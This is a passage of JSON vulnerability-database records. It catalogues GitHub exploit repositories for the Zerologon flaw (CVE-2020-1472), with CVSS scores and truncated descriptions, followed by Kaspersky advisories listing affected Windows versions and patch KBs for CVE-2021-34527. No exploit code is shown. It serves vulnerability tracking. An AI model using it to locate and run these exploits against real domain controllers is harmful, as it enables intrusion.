(MS-NRPC) Privi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:22:30", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-10-24T06:02:52", "id": "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:27:32", "description": "# cve-2020-1472\n\n@[toc](CATALOG)\n# \u6f0f\u6d1e\u539f\u7406\n\u539f\u7406\u6bd4\u8f83\u590d\u6742\uff0c\u6709\u5174\u8da3\u7684\u53ef\u4ee5\u770b\u770b\u4e0b\u9762\u94fe\u63a5\u4e0a\u7684\u6587\u7ae0h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-10T09:00:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-18T05:46:12", "id": "0CFAB531-412C-57A0-BD9E-EF072620C078", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:38", "description": "## Introduction article\nhttps://www.yuque.com/shamo-vs4ia/vul/kt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T08:32:52", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-28T04:59:11", "id": "9C9BD402-511C-597D-9864-647131FE6647", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:01:25", "description": "# Ladon Moudle CVE-2020-1472 Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T16:10:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-06-18T04:00:40", "id": "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:41:26", "description": "#\n# CVE-2020-1472 Event Reader v1.1 8/27/2020\n# This script will...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-05T15:17:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-05T15:19:05", "id": "5E80DB20-575C-537A-9B83-CCFCCB55E448", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:31:50", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-21T07:24:03", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T07:24:16", "id": "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-15T20:39:16", "description": "# CVE-2020-1472 POC\nmac\u73af\u5883\u4e0b\u901a\u8fc7proxychains\u4ee3\u7406\u7684\u65b9\u5f0f\u5728window\u57df\u73af\u5883\u4e2d\u590d\u73b0\u8be5\u6f0f\u6d1e\u3002\n\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:40:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-15T15:41:40", "id": "F472C105-E3B1-524A-BBF5-1C436185F6EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-14T14:10:49", "description": "# Zerologon test for SMB & RPC\nA python script based on [SecuraB...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T16:53:17", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-14T07:26:58", "id": "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:57:02", "description": "# zerologon\nzerologon script to exploit CVE-2020-1472 CVSS 10/10...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-01T07:38:58", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-17T15:08:53", "id": "3F400483-1F7E-5BE5-8612-4D55D450D553", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T17:49:59", "description": "# ZeroLogon - Exploit and Example\nModified the test PoC from [Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-03-01T04:21:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-12-29T12:28:45", "id": "BBE1926E-1EC7-5657-8766-3CA8418F815C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:37:26", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T23:15:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T23:15:54", "id": "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T10:22:33", "description": "\u590d\u73b0\u5b8c\u4e86\u6709\u70b9\u5c0fBUG\uff0c\u91cd\u542f\u540e\u4f1a\u5361\u5728\u767b\u5f55\u9875\u9762\u6bd4\u8f83\u4e45\u3002\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u53ea\u6709\u6211\u4f1a\u3002(\u8c28\u614e\u5728\u771f\u5b9e\u73af\u5883\u5229\u7528)\r\n\u5b9e\u6218\u4e2d\u53ef\u4ee5\u4f7f\u7528secretsd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:11:49", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-04-18T11:22:10", "id": "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:19:38", "description": "# CVE-2020-1472\nCVE-2020-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T16:36:40", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-16T03:58:43", "id": "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-07T07:28:43", "description": "# Zer0Dump\n\nZer0dump is an PoC exploit/tool for abusing the vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T19:27:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-06T23:37:31", "id": "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:16:55", "description": "# CVE-2020-1472\nCVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T10:25:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-05-12T02:52:15", "id": "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "kaspersky": [{"lastseen": "2023-05-23T16:31:24", "description": "### *Detect date*:\n07/01/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Products (Extended Support Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 Version 1809 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-34527](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34527>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-34527](<https://vulners.com/cve/CVE-2021-34527>)9.0Critical\n\n### *KB list*:\n[5004955](<http://support.microsoft.com/kb/5004955>) \n[5004959](<http://support.microsoft.com/kb/5004959>) \n[5004953](<http://support.microsoft.com/kb/5004953>) \n[5004951](<http://support.microsoft.com/kb/5004951>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T00:00:00", "type": "kaspersky", "title": "KLA12214 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-01-18T00:00:00", "id": "KLA12214", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12214/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:33:45", "description": "### *Detect date*:\n07/01/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 8.1 for 32-bit systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server, version 2004 (Server Core installation) \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 